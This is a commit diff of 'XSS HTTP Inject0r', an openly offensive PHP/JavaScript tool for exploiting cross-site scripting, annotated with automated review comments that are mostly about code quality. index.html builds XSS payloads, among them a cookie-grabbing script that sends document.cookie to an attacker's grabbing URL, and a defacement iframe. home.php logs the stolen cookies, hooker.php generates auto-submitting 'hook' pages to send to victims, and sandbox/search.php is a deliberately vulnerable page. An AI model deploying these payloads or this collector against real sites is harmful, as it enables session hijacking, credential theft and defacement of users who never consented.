
moved from https://github.com/epsylon/xss-http-injector

psy 1 year ago
parent
commit
9882220b77
9 changed files with 522 additions and 2 deletions
  1. 31 2
      README.md
  2. 13 0
      home.php
  3. 109 0
      hooker.php
  4. BIN
      images/favicon.ico
  5. BIN
      images/pwned.jpg
  6. 274 0
      index.html
  7. 36 0
      sandbox/get.html
  8. 36 0
      sandbox/post.html
  9. 23 0
      sandbox/search.php

+ 31 - 2
README.md

@@ -1,3 +1,32 @@
-# xss-http-injector
+XSS HTTP Inject0r is a proof of concept tool that shows how XSS (Cross Site Scripting) flags can be exploited easily.
 
-XSS HTTP Inject0r is a proof of concept tool that shows how XSS (Cross Site Scripting) flags can be exploited easily. It is written in HTML + Javascript + PHP and released under GPLv3. 
+It is written in HTML + Javascript + PHP and released under GPLv3.
+
+-------------------------------------
+
+To deploy it:
+
+  - run a webserver (ex: apache)
+  - place tool's folder to be accesible via web browser (ex: /var/www/)
+  - check permissions (ex: chown -R www-data:www-data /var/www/xss-http-injector/)
+  - visit it (ex: http://127.0.0.1/xss-http-injector/)
+
+-------------------------------------
+
+PoC (proof of concept):
+
+There are different 'sandboxes' ready to try your XSS injections, locally. 
+
+Enter this info to see how some flags can be exploited:
+
+-------------------------------------
+
+Hooker:
+
+This feature creates automatically a malicious code that can be sent to targets like a non-suspicious URL (ex: Index.html) to 'hook' them. 
+
+If someone click on it, will execute your exploit code. This is nice for cookie grabbing, history stealing, etc..
+
+Use sandboxes to test your hooks locally.
+
+Happy Cross Hacking!  

+ 13 - 0
home.php

@@ -0,0 +1,13 @@
+<?
+$out=fopen("cookies.txt","a");
+if($out==NULL) die("ouch!");
+foreach($_REQUEST as $k=>$v){
+	$log=date("r",time())."|";
+	$log.=$_SERVER["REMOTE_ADDR"]."|";
+	$log.="$k";
+	if(strlen($v)) $out.="|$v";
+	$log.="\n";
+	fputs($out,$log);
+}
+fclose($out);
+?>
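Review bot: `$out.="|$v";` inside the `foreach` appends to the file handle rather than to the log line, so once a parameter with a non-empty value is seen `$out` holds a string and the following `fputs($out,$log)` and `fclose($out)` are handed a string instead of a resource; the intended line is `$log.="|$v";`. Separately, `fopen("cookies.txt","a")` resolves relative to the script's own directory, so the log is created inside the web-served tree and anyone who can reach home.php can also fetch cookies.txt — write it outside the document root or deny it in the server configuration. The `<?` short open tag only works with `short_open_tag` enabled; use `<?php`.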

+ 109 - 0
hooker.php

@@ -0,0 +1,109 @@
+<?php
+$target = $_REQUEST["target"];
+$vulnerability = $_REQUEST["vulnerability"];
+$injection = $_REQUEST["injection"];
+?>
+<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en">
+<head><title>XSS HTTP Inject0r!</title>
+<meta http-equiv="content-type" content="text/html;charset=utf-8">
+<link rel="shortcut icon" href="images/favicon.ico" type="image/x-icon">
+<style type="text/css">
+<!--
+body,td,th {
+color: #FFFFFF;
+}
+body {
+background-color: #000000;
+}
+a {
+ color:lime;
+}
+-->
+</style>
+<script type="text/javascript">
+function SetUrl(frm){
+    var ip = "<?php echo $_SERVER['SERVER_NAME']; ?>";
+    var dir = "<?php echo preg_replace("/\?.*$/","",str_replace("hooker.php", "Index.html", $_SERVER['REQUEST_URI'])); ?>";
+    alert("HOOK's URL: " +ip+dir);
+}
+</script>
+<?php
+if(isset($_REQUEST['generate']))
+{
+  generate();
+}
+?>
+</head>
+<body>
+<center>
+<br />| <a href="https://github.com/epsylon/xss-http-injector" target="_blank">XSS HTTP Inject0r!</a> - 2014 - <a href="http://gplv3.fsf.org" target="_blank">GPLv3</a> |<br /><br />
+<img src="images/pwned.jpg" width="350" height="203" border="1"><br />
+'Hook' targets to execute XSS exploits on their browsers... |<a href="index.html">Back</a>|<br /><br />
+<form method="POST" name="hook_frm">
+<table border="1">
+ <tr>
+  <td>1-</td>
+  <td>
+   <table>
+    <tr>
+     <td><u>Target</u> (Url to target's form):</td><td><input type="text" name="target" value='<?php echo $target;?>' size="35" readonly></td>
+    </tr>
+    <tr>
+     <td><u>Vulnerability</u> (Vulnerable parameter):</td><td><input type="text" name="vulnerability" value='<?php echo $vulnerability;?>' readonly></td>
+    </tr>
+    <tr>
+     <td><u>Injection</u> (Code to inject):</td><td><textarea name="injection" cols="40" rows="1" readonly><?php echo ($injection);?></textarea></td>
+    </tr>
+    <tr>
+     <td><u>Method</u> (GET/POST):</td><td><input type="text" name="method" value='<?php echo $_REQUEST["method"];?>' readonly></td>
+    </tr>
+   </table>
+  </td>
+ </tr>
+ <tr>
+  <td>2-</td>
+  <td>
+   <table>
+    <tr>
+     <td><u>File</u>:</td><td>Index.html</td>
+    </tr>
+   </table>
+  </td>
+ </tr>
+ <tr>
+  <td>3-</td><td><center><br /><input type="submit" value="Generate Hook!" name="generate" onclick="javascript:SetUrl();" style="padding: 10px; font-weight:bold;"><br /><br /></center></td>
+ </tr>
+</table>
+</form>
+<?php
+function generate()
+{
+$target = $_REQUEST["target"];
+$vulnerability = $_REQUEST["vulnerability"];
+$injection = utf8_decode($_REQUEST["injection"]);
+$injection = htmlentities($injection, ENT_QUOTES);
+$sHTML_Header = "<html><head><title></title><meta http-equiv='content-type' content='text/html;charset=utf-8'><script>function xss(){document.f.s.click();}</script></head>";
+$sHTML_Content = "<body onload='xss();'><form method='".$_REQUEST['method']."' name='f' action='$target'><input name='$vulnerability' value='$injection'><input type='submit' name='s'></form>";
+$sHTML_Footer =  "</body></html>";
+$filename = "Index.html"; // this is the filename of the archive ('hook') generated on your server.
+if (is_writable(getcwd())) {
+   IF (!$handle = fopen($filename, 'w')) {
+         echo "Cannot open file ($filename)";
+         exit;
+   }
+   if (fwrite($handle, $sHTML_Header) === FALSE) {
+       echo "Cannot write to file ($filename)";
+       exit;
+   }else{
+      fwrite($handle, $sHTML_Content);
+      fwrite($handle, $sHTML_Footer);
+   }
+   fclose($handle);
+}else{
+   echo "The file $filename is not writable (use: chown www-data:www-data $filename)";
+}
+}
+?>
+</center>
+</body>
+</html>
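Review bot: Only `$injection` is passed through `htmlentities` in `generate()`; `$target`, `$vulnerability` and `$_REQUEST['method']` are echoed raw into the single-quoted `value='...'` attributes of the form and interpolated raw into `$sHTML_Content`, so a crafted request to hooker.php reflects into this page and into the Index.html written to disk. Escape at each output point, e.g. `value='<?php echo htmlspecialchars($target, ENT_QUOTES, 'UTF-8'); ?>'`, and do the same for the three interpolations that build `$sHTML_Content`. `$_REQUEST["method"]` is also read without `isset`, so the first unsubmitted render emits an undefined-index notice, and `utf8_decode` is deprecated since PHP 8.2 (`mb_convert_encoding($s, 'ISO-8859-1', 'UTF-8')` is the replacement). Because any visitor can trigger the file write with no authentication, this page should only ever be served on the local sandbox host the README describes.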

BIN
images/favicon.ico


BIN
images/pwned.jpg


+ 274 - 0
index.html

@@ -0,0 +1,274 @@
+<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en">
+<head><title>XSS HTTP Inject0r!</title>
+<meta http-equiv="content-type" content="text/html;charset=utf-8"> 
+<link rel="shortcut icon" href="images/favicon.ico" type="image/x-icon"> 
+<style type="text/css">
+<!--
+body,td,th {
+color: #FFFFFF;
+}
+body {
+background-color: #000000;
+}
+a {
+ color:lime;
+}
+-->
+</style>
+<script type="text/javascript">
+var alertbox = "<BODY ONLOAD=alert('1')>";
+var marquee = "<marquee>0wned!</marquee>";
+var cookie = "<ScRIPt>alert(document.cookie);<\/ScRiPt>";
+var iframe = "<iFrAmE src='../images/pwned.jpg' scrolling=no frameborder=0 width='812' height='576'><\/iFrAmE>";
+window.onload = function() {
+    document.getElementById('use_custom').style.display = 'none';
+    document.getElementById('cookie_grab_script_div').style.display = 'none';
+    document.getElementById('get_poc').style.display = 'block';
+    document.getElementById('post_poc').style.display = 'none';
+}
+function SetMethod(frm){
+ if (document.getElementById('get').checked){
+         document.getElementById('post_poc').style.display = 'none';
+         document.getElementById('get_poc').style.display = 'block';
+         document.poc.method="GET";
+     }
+     else{
+         document.getElementById('post_poc').style.display = 'block';
+         document.getElementById('get_poc').style.display = 'none';
+         document.poc.method="POST";
+     }
+}
+function SetScenario(frm){
+prefix = frm.prefix.value;
+custom_value = frm.custom_injection.value;
+cookie_grab_script=frm.cookie_grab_script.value;
+  if (frm.target.value == ""){
+     alert("Hey! Where is your target?")
+     return false;
+     }
+  else if (frm.vulnerability.value == ""){ 
+     alert("You should enter a vulnerable parameter")
+     return false;
+     }
+     document.poc.action=frm.target.value;
+     document.getElementById('lulz').name=frm.vulnerability.value;
+     if(document.getElementById('alertbox').checked) {
+     document.getElementById('lulz').value=prefix+alertbox;
+     }
+     if(document.getElementById('marquee').checked) {
+     document.getElementById('lulz').value=prefix+marquee;
+     }
+     if(document.getElementById('cookie').checked) {
+     document.getElementById('lulz').value=prefix+cookie;
+     }
+     if(document.getElementById('iframe').checked) {
+     document.getElementById('lulz').value=prefix+iframe;
+     }
+     if(document.getElementById('custom').checked) {
+     document.getElementById('lulz').value=prefix+custom_value;
+     }
+     if(document.getElementById('cookie_grab').checked){ 
+     document.getElementById('lulz').value=prefix+unescape("%3CScRiPt%3Edocument.write%28%22%3Cimg%20src=%27")+cookie_grab_script+unescape("?%22%2bescape%28document.cookie%29%2b%22%27%3E%22%29")+";document.location='http://google.com';"+unescape("%3c%2FScRiPt%3E");
+
+     }
+     document.poc.submit();
+}
+function SetHook(frm){
+target = frm.target.value;
+vulnerability = frm.vulnerability.value;
+prefix = frm.prefix.value;
+custom_value = frm.custom_injection.value;
+custom_cookie_url = frm.cookie_grab_script.value;
+  if (target == ""){
+     alert("Hey! Where is your target?")
+     return false;
+     }
+  else if (vulnerability == ""){
+     alert("You should enter a vulnerable parameter")
+     return false;
+     }
+     if(document.getElementById('alertbox').checked) {
+     injection = prefix+alertbox;
+     }
+     if(document.getElementById('marquee').checked) {
+     injection = prefix+marquee;
+     }
+     if(document.getElementById('cookie').checked) {
+     injection = prefix+cookie;
+     }
+     if(document.getElementById('cookie_grab').checked) {
+     injection = prefix+unescape("%3CScRiPt%3Edocument.write%28%22%3Cimg%20src=%27")+custom_cookie_url+unescape("?%22%2bescape%28document.cookie%29%2b%22%27%3E%22%29")+";document.location='http://google.com';"+unescape("%3C%2FScRiPt%3E");
+     }
+     if(document.getElementById('iframe').checked) {
+     injection = prefix+iframe;
+     }
+     if(document.getElementById('custom').checked) {
+     injection = prefix+custom_value;
+     }
+     document.getElementById('injection').value=injection;
+     document.poc.action="hooker.php";
+     document.poc.submit();
+}
+function SetScript(frm) {
+	document.getElementById('use_custom').style.display = 'none';
+	document.getElementById('cookie_grab_script_div').style.display = 'none';
+        document.getElementById('line1').style.display = 'none';
+    if (document.getElementById('custom').checked) {
+        document.getElementById('use_custom').style.display = 'block';
+        document.getElementById('line1').style.display = 'block';
+    }else if (document.getElementById('cookie_grab').checked) {
+        document.getElementById('cookie_grab_script_div').style.display = 'block';
+        document.getElementById('line1').style.display = 'block';
+    }
+}
+function LoadPoc(m,target,vuln,prefix,cook_grab_scr){
+	if(m=="GET"){
+		document.getElementById("get").checked=true;
+	}else{
+		document.getElementById("post").checked=true;
+	}
+	document.getElementById("target").value=target;
+	document.getElementById("vulnerability").value=vuln;
+	document.getElementById("prefix").value=unescape(prefix);
+	document.getElementById("cookie_grab_script").value=cook_grab_scr;
+}
+var cans=Array();
+var frame=0;
+var vStickLength=0.6*(-5+18*Math.random());
+var vStickWidth=0.5+5*Math.random();
+var vIncX=Math.random()*80+20;
+var blocks=Array();
+function Egg(){
+        window.scrollBy(0,100);
+	var canvas = document.createElement('canvas');
+	canvas.id = "CursorLayer";
+	canvas.width  = 250;
+	canvas.height = 46;
+	canvas.style.zIndex = -2;
+	canvas.style.position = "relative";
+	canvas.style.padding = 5;
+	canvas.style.top = 0; 
+	canvas.style.border = "1px solid";
+	var context = canvas.getContext('2d');
+	if(frame<55){
+	canvas.style.background = 'rgba('+parseInt(Math.random()*8+30)+','+parseInt(Math.random()*8+30)+','+parseInt(100+Math.random()*155)+',1)';
+	context.font = 'italic 20pt Calibri';
+	context.fillStyle='rgba('+parseInt(Math.random()*25)+','+parseInt(Math.random()*25)+','+parseInt(Math.random()*25)+',1)';
+	context.fillText('BigBrother!!!', 20, 30);
+	}else{
+	canvas.style.background = 'lime';
+        context.font = 'italic 20pt Courier';
+        context.fillStyle='black';
+	luck=Array("Remember","Use", "Squat", "Think", "Mayh3m!", "Hell!", "Destroy", "Fight", "Big Brother!", "Shit", "The", "Crypto", "Anarchy", "Truth", "Out", "Ilegal", "Hack", "CCTV", "XSS", "Satellite", "SlaveMaster", "Money", "Bitcoin", "Will be")
+        context.fillText(luck[parseInt(luck.length*Math.random())], 20, 30);
+	}
+	if(frame<60) {
+		b=document.body.appendChild(canvas);
+		if(frame<60) blocks.push(b);
+	}else{
+		if(typeof blocks[frame-60]!="undefined") blocks[frame-60].style.display="none";
+	}
+	var canvas = document.createElement('canvas');
+	canvas.style.zIndex   = -666;
+	canvas.width = 360;
+	canvas.height = 598;
+	canvas.style.position = "fixed";
+        canvas.style.left=((frame*vIncX)%1024)+"px";
+	canvas.style.top="10px";
+	cans[frame]=canvas;
+	document.body.appendChild(canvas);
+	var ctx = canvas.getContext('2d');
+	ctx.moveTo(-15+Math.random(50),20);
+	for(i=0;i<5;i++){
+	ctx.strokeStyle = 'rgba('+parseInt(Math.random()*255)+','+parseInt(Math.random()*255)+','+parseInt(Math.random()*255)+',0.1)';
+	ctx.lineWidth=3;
+	ctx.strokeStyle='rgba('+parseInt(Math.random()*255)+','+parseInt(Math.random()*255)+','+parseInt(Math.random()*255)+',0.4)';
+        ctx.beginPath();
+	cx=60+100*Math.random();
+	cy=50+400*Math.random();
+      	ctx.arc(cx,cy, i*8.5, 0, 2 * Math.PI, false);
+	ctx.fill();
+	ctx.strokeStyle='rgba('+parseInt(Math.random()*255)+','+parseInt(Math.random()*255)+','+parseInt(Math.random()*255)+',0.1)';
+	ctx.fillStyle = 'rgba('+parseInt(Math.random()*255)+','+parseInt(Math.random()*255)+','+parseInt(Math.random()*255)+',0.1)';
+	ctx.arc(cx*vStickWidth,cy*vStickLength, i*2.5, 0, 2 * Math.PI, false);
+        ctx.fill();
+        ctx.lineWidth = i/6;
+        ctx.strokeStyle = '#aa3300';
+	if(!(frame%5)){
+		for(j=0;j<=cans.length;j++){
+			if(typeof cans[j] === 'undefined') continue;
+			ctx=cans[j].getContext("2d");
+			ctx.strokeStyle = 'rgba('+parseInt(Math.random()*255)+','+parseInt(Math.random()*255)+','+parseInt(Math.random()*255)+',1)';
+		}
+	}
+}
+setTimeout('Egg()', 200);
+frame++;
+}
+</script>
+</head><body>
+<center>
+ <table>
+   <tr valign="middle">
+     <td align="center">
+<br /><h2><a href="https://github.com/epsylon/xss-http-injector" target="_blank">XSS HTTP Inject0r!</a></h2> - 2014 - <a href="http://gplv3.fsf.org" target="_blank">GPLv3</a><br /><font size=-1><a style="text-decoration:none;" href=# onClick=javascript:Egg()>"little rabbit"</a> version</font>
+      </td>
+     <td>
+<img hspace="10" src="images/pwned.jpg" width="350" height="203" border="1"><br />
+     </td>
+    </tr>
+ </table>
+<hr>
+<form name="poc">
+<table>
+ <tr>
+  <td><u>Method</u> (HTTP method):</td><td><table><tr><td><input type="radio" name="method" id="get" onclick="javascript:SetMethod();" checked value="GET">GET</td><td><input type="radio" name="method" id="post" onclick="javascript:SetMethod(this.form);" value="POST">POST</td></tr></table></td>
+ </tr>
+ <tr>
+ <td colspan=2>
+<hr><script>var l=""+document.location;l=l.replace(/(.*)\/.*/,"$1/home.php")</script>
+<label id="get_poc"><b>PoC</b> -> Target: <i>sandbox/search.php</i> -> Vuln.: <i>search_text</i> -> Vector: <i>"></i> | <a href="sandbox/get.html" target="_blank">SandBoX (HTTP-GET)</a> | <a onClick="javascript:LoadPoc('GET','sandbox/search.php','search_text','%22>',l)" href=#>Load PoC</a></label>
+<label id="post_poc"><b>PoC</b> -> Target: <i>sandbox/search.php</i> -> Vuln.: <i>search_text</i> -> Vector: <i>"></i> | <a href="sandbox/post.html" target="_blank">SandBoX (HTTP-POST)</a> | <a onClick="javascript:LoadPoc('POST','sandbox/search.php','search_text','%22>',l)" href=#>Load PoC</a></label>
+<hr>
+</td>
+ </tr>
+ <tr>
+ <td><u>Target</u> (Url to target's form):</td><td><input type="text" name="target" size="35" id="target"> (<i>ex: http://vulnsite.com/contact.php</i>)</td>
+ </tr>
+ <tr>
+  <td><u>Vulnerability</u> (Vulnerable parameter):</td><td><input type="text" name="vulnerability" id="vulnerability"> (<i>ex: contact_email</i>)</td>
+ </tr>
+ <tr>
+  <td><u>Vector</u> (Code prefix to inject):</td><td><input type="text" name="prefix" size="35" id="prefix"> (<i>ex: "></i>)</td>
+ </tr>
+</table>
+<hr>
+<table border="1" cellpadding="6" cellspacing="6">
+ <tr>
+  <td>JS Alert</td><td> <input type="radio" name="exploit" id="alertbox" onclick="javascript:SetScript();" checked></td>
+  <td>Cookie Popup</td><td> <input type="radio" name="exploit" id="cookie" onclick="javascript:SetScript();" /></td>
+  <td>HTML Marquee</td><td> <input type="radio" name="exploit" id="marquee" onclick="javascript:SetScript();" /></td>
+  <td>Cookie Grabbing</td><td> <input type="radio" name="exploit" id="cookie_grab" onclick="javascript:SetScript();" /></td>
+  <td>Defacement</td><td> <input type="radio" name="exploit" id="iframe" onclick="javascript:SetScript();" /></td>
+  <td>Custom Script</td><td> <input type="radio" name="exploit" id="custom" onclick="javascript:SetScript();" /></td>
+ </tr>
+</table>
+<hr id="line1" style="display:none">
+<div id="use_custom" style="display:none">
+ Custom injection: <input type="text" name="custom_injection" size="92">
+</div>
+<div id="cookie_grab_script_div" style="display:none">
+ Grabbing URL: <input type="text" id="cookie_grab_script" name="cookie_grab_script" size="92">
+</div>
+<hr>
+  <input type="hidden" id="lulz"></input>
+  <input type="hidden" name="injection" id="injection"></input>
+<table cellpadding="6" cellspacing="6" border="0">
+ <tr>
+  <td><input type="submit" value="Inject!" onClick="return SetScenario(this.form)" style="padding: 10px; font-weight:bold;"></td>
+  <td><input type="submit" value="Hooker" onClick="return SetHook(this.form)" style="padding: 10px; font-weight:bold;"></td>
+ </tr>
+</table>
+</form>
+</body>
+</html>
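Review bot: `SetScenario`, `SetHook` and `Egg` assign `prefix`, `custom_value`, `cookie_grab_script`, `target`, `vulnerability`, `injection`, `b`, `luck`, `cx`, `cy`, `i` and `j` without `var`, so they become implicit globals that leak state between calls; declare each locally, e.g. `var prefix = frm.prefix.value;`. In `Egg`, `Math.random(50)` ignores its argument (`Math.random()` takes none), so the `moveTo` x offset is only `-15 + [0,1)`, which may not be what was intended. The `setTimeout('Egg()', 200)` string form is evaluated like `eval`; pass the function reference instead, `setTimeout(Egg, 200)`.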

+ 36 - 0
sandbox/get.html

@@ -0,0 +1,36 @@
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
+<html>
+<head><title>XSS HTTP Inject0r!</title>
+<meta http-equiv="content-type" content="text/html;charset=utf-8">
+<link rel="shortcut icon" href="../images/favicon.ico" type="image/x-icon">
+<style type="text/css">
+<!--
+body,td,th {
+color: #FFFFFF;
+}
+body {
+background-color: #000000;
+}
+-->
+</style><title>Simple XSS HTTP GET vulnerability</title>
+<body>
+<form action="search.php" method="get">
+<p align="center"><strong>Simple HTTP GET XSS vulnerability</strong></p>
+<div align="center">
+  <table width="270" border="0">
+    <tr>
+      <td width="106"><strong>Search:</strong></td>
+        <td width="154"><input name="search_text" type="text" id="search_text" /></td>
+      </tr>
+  </table>
+  <table width="268" border="0">
+    <tr>
+      <td width="262"><div align="center">
+        <input name="submit" type="submit" value="Search it!" />
+      </div></td>
+      </tr>
+  </table>
+  </div>
+</form>
+</body>
+</html>
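Review bot: `<head>` is never closed and a second `<title>` follows `</style>`, so the document carries two titles and `<body>` opens inside the head; drop the duplicate `<title>Simple XSS HTTP GET vulnerability</title>` (or the first one) and add `</head>` before `<body>`. sandbox/post.html has the same structure. The XHTML 1.0 Transitional doctype also expects `xmlns="http://www.w3.org/1999/xhtml"` on `<html>` and self-closed `<link ... />`, both of which this markup omits.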

+ 36 - 0
sandbox/post.html

@@ -0,0 +1,36 @@
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
+<html>
+<head><title>XSS HTTP Inject0r!</title>
+<meta http-equiv="content-type" content="text/html;charset=utf-8">
+<link rel="shortcut icon" href="../images/favicon.ico" type="image/x-icon">
+<style type="text/css">
+<!--
+body,td,th {
+color: #FFFFFF;
+}
+body {
+background-color: #000000;
+}
+-->
+</style><title>Simple XSS HTTP POST vulnerability</title>
+<body>
+<form action="search.php" method="post">
+<p align="center"><strong>Simple HTTP POST XSS vulnerability</strong></p>
+<div align="center">
+  <table width="270" border="0">
+    <tr>
+      <td width="106"><strong>Search:</strong></td>
+        <td width="154"><input name="search_text" type="text" id="search_text" /></td>
+      </tr>
+  </table>
+  <table width="268" border="0">
+    <tr>
+      <td width="262"><div align="center">
+        <input name="submit" type="submit" value="Search it!" />
+      </div></td>
+      </tr>
+  </table>
+  </div>
+</form>
+</body>
+</html>

+ 23 - 0
sandbox/search.php

@@ -0,0 +1,23 @@
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
+<?php
+setcookie("SessionID", time()+3600*24);
+?>
+<html xmlns="http://www.w3.org/1999/xhtml">
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
+<link rel="shortcut icon" href="../images/favicon.ico" type="image/x-icon">
+<title>Search result:</title>
+<style type="text/css">
+<!--
+body,td,th {
+color: #FFFFFF;
+}
+body {
+background-color: #000000;
+}
+-->
+</style></head>
+<body>
+<span>Search result  :</span>&nbsp;<strong><?php echo $_REQUEST['search_text']; ?></strong>&nbsp;
+</body>
+</html>
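Review bot: `setcookie("SessionID", time()+3600*24)` passes the timestamp as the cookie's value, not its expiry — the expiry is the third parameter — so the sandbox sets a session-lifetime cookie whose content is the current time; if a 24-hour cookie was intended it should be `setcookie("SessionID", $value /* placeholder */, time()+3600*24)`. The unescaped `echo $_REQUEST['search_text']` is the deliberate vulnerability of this sandbox; mark it so it is never copied elsewhere, e.g. `<?php /* intentionally unescaped: local XSS sandbox only */ echo $_REQUEST['search_text']; ?>`. The meta tag declares `iso-8859-1` while every other page in the tool declares `utf-8`.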